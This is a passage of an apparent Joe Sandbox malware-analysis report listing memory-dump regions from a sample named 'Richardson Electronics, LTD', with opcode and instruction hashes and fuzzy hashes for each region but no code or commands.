                                                              • API String ID:
                                                              • Opcode ID: 1d0c24e09f4f065f710357baad387c7fd449634b3d8bab693c4f7efa976b8f95
                                                              • Instruction ID: 85fe2180e0c30771b33f032a8f77547029bf012a15e1901a42e8e9a340a98654
                                                              • Opcode Fuzzy Hash: 1d0c24e09f4f065f710357baad387c7fd449634b3d8bab693c4f7efa976b8f95
                                                              • Instruction Fuzzy Hash: 14F1FF34A40219DFDB58DFA5D998E9DBBB2FF88300F118159E506AB3A5DB71EC42CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201487274.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6050000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc96d4bdcbd5920035bcaba4e743d938575578fe5758b100b4f69e2083ecd55f
                                                              • Instruction ID: ed470a080aaef2abb6b26c91ff9f44a2f77c6228dc439aaae91db20c9f84a63b
                                                              • Opcode Fuzzy Hash: bc96d4bdcbd5920035bcaba4e743d938575578fe5758b100b4f69e2083ecd55f
                                                              • Instruction Fuzzy Hash: 64F1C234D41208DFDBA8DFA4E4986AEBFB2FF49301F208569E816A7354DB355986CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9e48453c6590beffc2865cfd82728ded52be0399f1a3a9f7fbc879e7ed7e388
                                                              • Instruction ID: 5d3547f1ebb7544d65f313e8b77c70e12f7a308ac5895d76f9f55f77bb0e924e
                                                              • Opcode Fuzzy Hash: e9e48453c6590beffc2865cfd82728ded52be0399f1a3a9f7fbc879e7ed7e388
                                                              • Instruction Fuzzy Hash: 75F05E319493C59FC752CBB8C5546A9FFF0EF07210B2842DAC8D48B2A3C2355A83CB42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201487274.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6050000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 416056da1ef5355a85b8a7ca0a7141269e55086142ba0d62d219226a2806a8c2
                                                              • Instruction ID: 9f09906df4c456faef3bcc99a781a234fd4be764ab0bc5d16a9031e88c01de5b
                                                              • Opcode Fuzzy Hash: 416056da1ef5355a85b8a7ca0a7141269e55086142ba0d62d219226a2806a8c2
                                                              • Instruction Fuzzy Hash: 2FC1D374E4120DCFDB98DFA5D4986EEBBB2FF48305F118029D815AB294DB345A86CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6103ca003d4e485c590dfe69f883760a2cd2c1cc98ae9bd7319408c5659991bc
                                                              • Instruction ID: c9488ac18eaf2452f9b5f508c9257ad8e46190b2218a1e803bcc6fefeda73367
                                                              • Opcode Fuzzy Hash: 6103ca003d4e485c590dfe69f883760a2cd2c1cc98ae9bd7319408c5659991bc
                                                              • Instruction Fuzzy Hash: 0ED10A79E54218CFDB94EFA4E844BADBBB6FB4A300F1082A9D409A7354CB305D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 712aa8f2217a4d618ed7a4de41db29f068c91c1c8242e95bfc5155ab18c30dd9
                                                              • Instruction ID: 4d99a18bd6628569a42af5f3e8a0428c49986fd6d3f0ac45c8abd41c40c24355
                                                              • Opcode Fuzzy Hash: 712aa8f2217a4d618ed7a4de41db29f068c91c1c8242e95bfc5155ab18c30dd9
                                                              • Instruction Fuzzy Hash: E7C1F879E54218CFDB94EFA4E844BADBBB6FB4A300F1082A9D509A7354CB315D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c5fe259ae096556475d05e6677761c162b229863e29099fe2726d14db914d51
                                                              • Instruction ID: 1ac01da9bcf370c11f536c8ed77b100b43ca27a90d55e544b5eb4b010570701f
                                                              • Opcode Fuzzy Hash: 0c5fe259ae096556475d05e6677761c162b229863e29099fe2726d14db914d51
                                                              • Instruction Fuzzy Hash: 69D1FA79E50218CFDB94EFA4E844BADBBB6FB4A300F5082A9D509A7358CB315D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 543fb693ab2da88bdcd50d0bcc788d48c9a2df48b21af27d8c1623fc85ee20fa
                                                              • Instruction ID: 845de1ed2a732642db542156430ead716d64f943acc35f20d64ca0c36c2008ff
                                                              • Opcode Fuzzy Hash: 543fb693ab2da88bdcd50d0bcc788d48c9a2df48b21af27d8c1623fc85ee20fa
                                                              • Instruction Fuzzy Hash: 77C1F978E54218CFDB94EFA4E844BADBBB6FB4A300F1092A9D509A7358CB305D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e95ae4f622b624ccfec60979ff6903ee50dcccebf1d60032865254a8857cdd14
                                                              • Instruction ID: a0b530073f762710ff002dc5d6dfacf1a96a9639e8e01030852ca259c047779e
                                                              • Opcode Fuzzy Hash: e95ae4f622b624ccfec60979ff6903ee50dcccebf1d60032865254a8857cdd14
                                                              • Instruction Fuzzy Hash: E2C1FB79E54218CFDB94EFA4E844BADBBB6FB4A300F1092A9D50AA7354CB305D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0af4c7e8ccb75a154743b1bb88ae6bc9079cb8d58b42301d6122939045336b5e
                                                              • Instruction ID: 656901bf82fc12f07ff0f0408bfb208cc448d7947380e8ca5dd08f77af494839
                                                              • Opcode Fuzzy Hash: 0af4c7e8ccb75a154743b1bb88ae6bc9079cb8d58b42301d6122939045336b5e
                                                              • Instruction Fuzzy Hash: 3DC1F979E50218CFDB94EFA4E844BADBBB6FB4A300F1082A9D509A7358CB305D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c3b80c012c5db023ac18ed236f9d4b9a535d76d85ac34512ce7fb4371f96a4c
                                                              • Instruction ID: c3af100df46d454e4be162d5c88e8a056ede0da00b820d27eae0c5fc94d51198
                                                              • Opcode Fuzzy Hash: 7c3b80c012c5db023ac18ed236f9d4b9a535d76d85ac34512ce7fb4371f96a4c
                                                              • Instruction Fuzzy Hash: 5E912434B402188FDB55DF29C884AAE7BF6BF89710B1180A9E505DB3B5DB71EC41CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 412d3175e72c4f2c71967633db44def2afa96511922a544cb3f7e3275d746556
                                                              • Instruction ID: 47d3b3f387119224620c859ead29d10f6a446bc77b3f2c0065556a3a25e9443b
                                                              • Opcode Fuzzy Hash: 412d3175e72c4f2c71967633db44def2afa96511922a544cb3f7e3275d746556
                                                              • Instruction Fuzzy Hash: 47B12774D55209DFDB98DFE8D4446AEBBF1FB89300F20802AE516AB794CB345A81CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a273c56b9d6ef71d2d5a1f8e0e193e4fc9b5a328bdcd6e4138d51c45a6cb213b
                                                              • Instruction ID: bd989b875c95906b9515f48dafa8452e071289baf542886bd564deb09d04208e
                                                              • Opcode Fuzzy Hash: a273c56b9d6ef71d2d5a1f8e0e193e4fc9b5a328bdcd6e4138d51c45a6cb213b
                                                              • Instruction Fuzzy Hash: 8B919C35B812049FDB48CFA5DA54AADBBF2EF88310F148069F9129B390CB79DD41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6784a2517165a0dcf7e71a93cb7e8804e04f8bd678f2337693b3ca2bfcd7aa30
                                                              • Instruction ID: 559d6344d133927347881c9fd565b21e361486af31e56ea3692297e40bf743dd
                                                              • Opcode Fuzzy Hash: 6784a2517165a0dcf7e71a93cb7e8804e04f8bd678f2337693b3ca2bfcd7aa30
                                                              • Instruction Fuzzy Hash: 9FA11F34A50219DFCB48DFA5D898E9DBBB2FF88300F158159E846AB365DB70EC46CB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5bfdf45bf87d139c04a31ca10c4be74f6684432ee6acb34c86e9f372b482b6d8
                                                              • Instruction ID: c60da762a4485bab78748f836b8dd0f00d374af5de1cb18cf1d8117b822c5bc5
                                                              • Opcode Fuzzy Hash: 5bfdf45bf87d139c04a31ca10c4be74f6684432ee6acb34c86e9f372b482b6d8
                                                              • Instruction Fuzzy Hash: B1914A34B50214DFDB98DF69D894AADBBB6AF89710F1440A9F5069B3A1CB34AC41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f542087dc0bdcc484bb8c81bef971041bccd437b3c590e85906039b59f2fe6e7
                                                              • Instruction ID: 170e8441df58ca58a7d9daeea92222c0eb648806a67b14561e374a437e920c9d
                                                              • Opcode Fuzzy Hash: f542087dc0bdcc484bb8c81bef971041bccd437b3c590e85906039b59f2fe6e7
                                                              • Instruction Fuzzy Hash: 10815A35A50218CFCB54DF69C48499EBBF6FF88310B158169E916DB361DB31EC41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f9e2f624639cde6bdd05aee5071780839f110a7b943d87085c39916ce85058e
                                                              • Instruction ID: 329756cb8d3eb35ce64a0898976a456e68cb64ee855b822fc97a969e24f4fbb9
                                                              • Opcode Fuzzy Hash: 9f9e2f624639cde6bdd05aee5071780839f110a7b943d87085c39916ce85058e
                                                              • Instruction Fuzzy Hash: E4911474D41218CFEBA8DF68D944BADBBF2BB4A300F1091AAD509A7384DB705E84CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76f649e1668ae44de19f5d7dbc5527d7b2d23cac4c3a89779e9a80dd7f926f1b
                                                              • Instruction ID: 4f9c7b298115ce054dd2320570618398d93a06c634cc6114331ebcdc5d1edae2
                                                              • Opcode Fuzzy Hash: 76f649e1668ae44de19f5d7dbc5527d7b2d23cac4c3a89779e9a80dd7f926f1b
                                                              • Instruction Fuzzy Hash: 96812074D46308CFEB94DFA9D8447ADBFF2BB49304F54826AD009AB291DB754986CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7444891c1ecdb348fec5b754d12bb87498e8b53e5f051a520ab094494e05854b
                                                              • Instruction ID: 37417c638979d57ae7a7fa2f75a8704972fbbb05e4a794557eec305a219f3cad
                                                              • Opcode Fuzzy Hash: 7444891c1ecdb348fec5b754d12bb87498e8b53e5f051a520ab094494e05854b
                                                              • Instruction Fuzzy Hash: 4D814674D64209DFDB94DFE8D4446AEBBF1FB49300F20802AE616AB794DB344A85CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab0d6cccf9988635953f50ab337df36cafe57879e63d1386099186fea5ca4509
                                                              • Instruction ID: 1abb6c8d32456c2af5f91ba0ee8958578f0372adaffab5cb671742ada685f5bf
                                                              • Opcode Fuzzy Hash: ab0d6cccf9988635953f50ab337df36cafe57879e63d1386099186fea5ca4509
                                                              • Instruction Fuzzy Hash: CC913974D41218CFEBA8DF68D844BADBBF2BB4A300F5091A9D509A7384DB705E85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c610af7c682a1bd5327ae72ff0dea8da15acdf43e068ecc40ae1cb1cb5b25cf0
                                                              • Instruction ID: 5deeaa46c633df0b62b3fc15fd9f3291f42dabec0f76b04cfa2bb533bbf5e9c6
                                                              • Opcode Fuzzy Hash: c610af7c682a1bd5327ae72ff0dea8da15acdf43e068ecc40ae1cb1cb5b25cf0
                                                              • Instruction Fuzzy Hash: E061BC317002458FDB5ADF29D850AAE3FA6EFC5340B14816AF9068F2A1CB34DC56CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ffa2b9d4df4ae12c1088700215f9e590539d12d43333c5d35c2461c4e7899e6
                                                              • Instruction ID: 2bd27e8a0dc7304719511f41cc34290dca19f67036edd98779102644a4ec9177
                                                              • Opcode Fuzzy Hash: 0ffa2b9d4df4ae12c1088700215f9e590539d12d43333c5d35c2461c4e7899e6
                                                              • Instruction Fuzzy Hash: 91710274D61609CFDB84CFA9D4447AEBBF2BF89310F10802AE509B7650DB729A85CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ffda11c5eef74c13a25a3f57f6eb7158744ede8c879ff972273a9067c0cfa60
                                                              • Instruction ID: ab48ef27cd46ca786cf8cc6051c28a36445a4028e8d01f83019f43c2c34c2b31
                                                              • Opcode Fuzzy Hash: 9ffda11c5eef74c13a25a3f57f6eb7158744ede8c879ff972273a9067c0cfa60
                                                              • Instruction Fuzzy Hash: BD712174D46318CFEB94DFAAD8447EDBBF2BB49304F549229D009A7290D774088ACF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b370307cd94d0b207e980665c3bfcae7e8b8bdce7449304b25129f4ab92d35c1
                                                              • Instruction ID: 09916f48c39b905788e4ab975a56d09c1f4d4e8352fda04aa83257e0102e8d6c
                                                              • Opcode Fuzzy Hash: b370307cd94d0b207e980665c3bfcae7e8b8bdce7449304b25129f4ab92d35c1
                                                              • Instruction Fuzzy Hash: CE711534D41218CFEB98DF64D854BADBBF2BB4A300F5092AAD509A7385DB305E85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c9efee02a3a70884422e07ac57b79ceff1df12992f93e552bd5916599aad015
                                                              • Instruction ID: 71a248dfee6f1b5b4de2984560567cb9d61128969270216a9731dda2733af12a
                                                              • Opcode Fuzzy Hash: 3c9efee02a3a70884422e07ac57b79ceff1df12992f93e552bd5916599aad015
                                                              • Instruction Fuzzy Hash: 2C711F74D46318CFEB94DFAAE8447EDBBF2BB49304F549229D009A7295DB74088ACF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c38c740da0ed0b109b0fd5bfc8aba72582c6e18d8efcfe0665c3865ed72e88c1
                                                              • Instruction ID: cb4faee97aefab61499151d50c37bab692ca0a537e383e3ba9de61166b276f5f
                                                              • Opcode Fuzzy Hash: c38c740da0ed0b109b0fd5bfc8aba72582c6e18d8efcfe0665c3865ed72e88c1
                                                              • Instruction Fuzzy Hash: 9081F374E11348CFEB94DFA5D884BACBBF2BF49304F2481A9D009AB295CB755985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f89d178db86475cd212e677385ced9a3146e82599c6d376243451786bc4ff908
                                                              • Instruction ID: 51f53128a9f95c0ee36e33195128d6d9e50923b0732def3e6686e3bc0686c895
                                                              • Opcode Fuzzy Hash: f89d178db86475cd212e677385ced9a3146e82599c6d376243451786bc4ff908
                                                              • Instruction Fuzzy Hash: E071F274D61609CFDB84CFA9D4447AEBBF2BF89310F10802AE509B7650DB729A85CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fdf38f4916d346ce192537d7c26c9dca267b306c252f8ab2705e09a669f1989b
                                                              • Instruction ID: a11f1f1fef87fa952fe15a34d9627c17df7805ea05ecaada826e9aca9327bd34
                                                              • Opcode Fuzzy Hash: fdf38f4916d346ce192537d7c26c9dca267b306c252f8ab2705e09a669f1989b
                                                              • Instruction Fuzzy Hash: 5F613B34B50204DFDB98DF69D894AADBBB6BF88700F148069F9469B365CB70EC41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73ad4adc82c51536ebd3ae9a831376f57348a7f8faa6a150f8ea85b3b330d77a
                                                              • Instruction ID: c7810d9767bc92fb5590a2686564405335d1bad1051be6a644f073079a8e297b
                                                              • Opcode Fuzzy Hash: 73ad4adc82c51536ebd3ae9a831376f57348a7f8faa6a150f8ea85b3b330d77a
                                                              • Instruction Fuzzy Hash: 1B611F74D86308CFEB94DFA9D8847ADBFF2BB4A304F649229D009A7254D7744886CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f22f042e4bf7235c56a85dc27eea396f918a4c5a441f6d533312ce68344d04ce
                                                              • Instruction ID: e86b6253d82c5f782c8f90f8fffb843c622915081c244173729c0cba7ad09497
                                                              • Opcode Fuzzy Hash: f22f042e4bf7235c56a85dc27eea396f918a4c5a441f6d533312ce68344d04ce
                                                              • Instruction Fuzzy Hash: 4E519074E10259CFDB14CFA8D8859EEBBB6BF89710F2481A9DA01AB352D7349845CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 385e4bcd495c5e5760a3ac1b8bc15e1ed52b4c4c406d45a36ae19b01e748e52b
                                                              • Instruction ID: 31db9ae1e1efb1b5fc6f90e0fd81d868556cd0e4c2b0e4a9a430a13a3cf5c3f4
                                                              • Opcode Fuzzy Hash: 385e4bcd495c5e5760a3ac1b8bc15e1ed52b4c4c406d45a36ae19b01e748e52b
                                                              • Instruction Fuzzy Hash: 8C5168347402058FD7A9EF75C86452E7BA7BFC9240710446DE5469B3A0CF39DC0ACB94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 696400480d95eb871fe11d670febe2c378d559344287edfb4ae9a33f4dbda748
                                                              • Instruction ID: 2db87c636ae2d7c933ec90f2d0a56eff4e29751ec2c25c07a10f199026f6a0a5
                                                              • Opcode Fuzzy Hash: 696400480d95eb871fe11d670febe2c378d559344287edfb4ae9a33f4dbda748
                                                              • Instruction Fuzzy Hash: 19613574E0022ACFDB44DFA4E484AEEBBB6FF8A305F50542AE516A7384C7705985CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f7cd366b038dfc76c3f56fcdb375110c777792f37c49a7989471d1c04520475
                                                              • Instruction ID: f2417521a18d92b504cee63245898469bef831100488a2a1f4f31eb54a800163
                                                              • Opcode Fuzzy Hash: 5f7cd366b038dfc76c3f56fcdb375110c777792f37c49a7989471d1c04520475
                                                              • Instruction Fuzzy Hash: 01519136604240AFC7569F69E814D5A7FB6EF8A61070A80E6F209CF772CB31DC15DBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7813fe960019f13662d76b8033cbfa08d92e506cb766728d3894b25f934ecbb
                                                              • Instruction ID: c991f114e58e5a15915f73260d199f2908dc2f805cf3ccbf56f1da61beb9f6f4
                                                              • Opcode Fuzzy Hash: b7813fe960019f13662d76b8033cbfa08d92e506cb766728d3894b25f934ecbb
                                                              • Instruction Fuzzy Hash: E7610874DA1208CFEBA4CFA5D844B9DBFF2BF49304F2480A9D209A7651D7B55985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1f56d3e55f69d32c8ad4493234bed0b82e30f47a4f0035376250a5845d1b55c
                                                              • Instruction ID: c917a816b6bbf1d39869d26bdc24e996d88bb9e368d9768b8b96785a27dbf23a
                                                              • Opcode Fuzzy Hash: e1f56d3e55f69d32c8ad4493234bed0b82e30f47a4f0035376250a5845d1b55c
                                                              • Instruction Fuzzy Hash: EB514A34B40609DFCB08EFA4E458AAEBBB6FFC8711F008119E5429B364DF749946CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3dcd9923455feb48d517a125c44f7408860cc234f614cabdc7547779779ae4f5
